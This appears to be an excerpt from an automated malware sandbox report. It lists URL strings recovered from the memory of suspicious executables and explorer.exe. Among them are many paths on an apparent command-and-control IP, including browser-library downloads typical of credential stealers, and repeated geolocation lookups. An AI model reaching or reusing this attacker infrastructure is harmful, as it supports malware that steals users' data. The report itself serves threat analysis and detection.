Source: 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 1601.exe, 00000010.00000003.1828509755.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293734667.000000001EA2D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1601.exe, 00000010.00000003.1828581062.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 1601.exe, 00000010.00000003.1828653914.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: 1601.exe, 00000010.00000003.1828726463.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73
Source: build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1976797095.0000000000A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/
Source: build2.exe, 00000013.00000003.1974746557.0000000000A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/$/B
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/&w
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/.com
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/0H
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/1
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/7
Source: build2.exe, 00000013.00000003.1974746557.0000000000A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/:/4
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/A
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/AFIJDGHCAKECAEGCAAKEHD
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/B
Source: build2.exe, 00000013.00000003.1990340440.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/C
Source: build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/G
Source: build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/H
Source: build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/N
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/P
Source: build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/R
Source: build2.exe, 00000013.00000003.1990340440.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/U
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/Y
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/a
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/amData
Source: build2.exe, 00000013.00000003.1990340440.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/c
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/curity
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/d
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/f
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/freebl3.dll
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/i
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/j
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/k
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/mozglue.dll
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/mozglue.dlll
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/msvcp140.dll
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/msvcp140.dll1
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/msvcp140.dll1te
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/nss3.dll
Source: build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/nss3.dll6
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/nss3.dllK
Source: build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/nss3.dllzedv5
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/o
Source: build2.exe, 00000013.00000003.1990340440.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/oN
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/ocal
Source: build2.exe, 00000013.00000003.1991865674.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/p
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/r
Source: build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1974746557.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/s
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/softokn3.dllN
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/softokn3.dllb
Source: build2.exe, 00000013.00000002.2287228950.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/sqln.dll
Source: build2.exe, 00000013.00000002.2289169200.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/sqln.dllB
Source: build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/v
Source: build2.exe, 00000013.00000003.2159513873.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/vcruntime140.dll
Source: build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/vcruntime140.dllV
Source: build2.exe, 00000013.00000003.1990340440.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1992439424.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1991865674.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/x
Source: build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/y
Source: build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73/z
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73;
Source: build2.exe, 00000013.00000002.2287228950.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73KFID
Source: build2.exe, 00000013.00000002.2287228950.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73KFIJ
Source: build2.exe, 00000013.00000002.2287228950.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73Local
Source: build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.216.179.73x
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1435191718.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
Source: explorer.exe, 00000002.00000000.1435191718.000000000D1FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: 1601.exe, 00000009.00000002.1747762980.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2013286171.00000000005AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: 1601.exe, 00000026.00000002.2013286171.00000000005AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/7
Source: 1601.exe, 00000011.00000002.2620858851.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/N
Source: 1601.exe, 00000009.00000002.1747762980.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/_
Source: 1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2013286171.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2013286171.0000000000568000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: 1601.exe, 00000026.00000002.2013286171.00000000005AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json&
Source: 1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json1
Source: 1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json8
Source: 1601.exe, 00000009.00000002.1747762980.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json=
Source: 1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonI
Source: 1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonN
Source: 1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonP
Source: 1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonX8N
Source: 1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonZL
Source: 1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonal
Source: 1601.exe, 00000026.00000002.2013286171.0000000000568000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonj6
Source: 1601.exe, 00000026.00000002.2013286171.0000000000568000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons~
Source: 1601.exe, 00000010.00000002.2621304334.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/p
Source: 1601.exe, 00000010.00000002.2621304334.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/v
Source: explorer.exe, 00000027.00000003.2059945515.0000000009165000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2053341050.0000000009166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1430666341.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/$
Source: explorer.exe, 00000002.00000000.1430666341.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 00000027.00000002.2630539782.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2054996253.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.0000000009260000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2063013012.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2052467089.0000000009260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1430666341.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000027.00000003.2059945515.0000000009165000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2053341050.0000000009166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?N
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1428012829.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2053341050.000000000921D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000027.00000003.2059945515.0000000009165000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.0000000009166000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2053341050.0000000009166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1430666341.0000000009390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comWzE
Source: explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
